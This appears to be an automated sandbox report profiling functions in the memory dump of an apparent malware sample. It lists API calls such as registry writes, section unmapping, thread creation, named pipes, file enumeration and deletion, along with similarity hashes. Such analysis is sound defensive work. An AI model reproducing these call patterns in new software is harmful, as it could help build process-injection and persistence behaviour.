    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5816, Relevance: 10.6, APIs: 7, Instructions: 109 Total matches: 43stringsleepmemory
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2A39, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102 Total matches: 43memory
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
